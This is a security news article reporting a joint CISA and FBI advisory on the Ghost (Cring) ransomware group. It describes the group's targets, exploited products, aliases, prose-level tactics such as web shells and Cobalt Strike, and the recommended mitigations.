CISA, FBI warn of Ghost/Cring ransomware attacks

U.S. authorities published a joint advisory Wednesday warning of attacks from the long-running Ghost ransomware group.

Ghost, also known as Cring, is a ransomware group first identified in early 2021 in campaigns including one targeting a vulnerability in Fortinet's Fortigate VPNs. The joint advisory from CISA, the FBI and Multi-State Information Sharing and Analysis Center shared identified indicators of compromise (IOCs), as well as tactics, techniques and procedures (TTPs) related to the gang -- including those identified as recently as this year.

CISA said Ghost actors targeted victims "whose internet facing services ran outdated versions of software and firmware." The threat group, located in China, used vulnerabilities to compromise organizations in more than 70 countries, including its home country. Its activities, which CISA said are financially motivated, target many sectors, including SMBs, critical infrastructure, education, healthcare, government networks, religious institutions and more.

As Ghost rotates its ransomware executable payloads and modifies ransom note text, it has been attributed as Cring, Crypt3r, Hello, Phantom, Strike, Wickrme, HsHarada and Rapture.

Ghost primarily targets public-facing applications associated with multiple vulnerabilities, including Fortinet FortiOS appliances, Adobe ColdFusion servers, Microsoft SharePoint and Microsoft Exchange. Once they gain initial access, the Ghost actors "have been observed uploading a web shell to a compromised server and leveraging Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon malware that is then implanted on victim systems," the advisory said.

CISA said Ghost generally spends only up to a few days deploying its ransomware, with persistence not being a major priority for the group; it has also been observed deploying ransomware the same day.

Although many of Ghost's TTPs are common among ransomware actors, the threat actor apparently does not frequently exfiltrate a victim's most sensitive data.

"Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked," the advisory read. "The FBI has observed limited downloading of data to Cobalt Strike Team Servers. Victims and other trusted third parties have reported limited uses of Mega.nz and installed web shells for similar limited data exfiltration. Note: The typical data exfiltration is less than hundreds of gigabytes of data."

Other TTPs, IOCs, and MITRE ATT&CK Tactics and Techniques are included in the full advisory.

As for mitigations, the three agencies advised that organizations maintain regular system backups, patch known vulnerabilities, implement phishing-resistant MFA and monitor for unauthorized use of PowerShell.

Alexander Culafi is a senior information security news writer and podcast host for Informa TechTarget.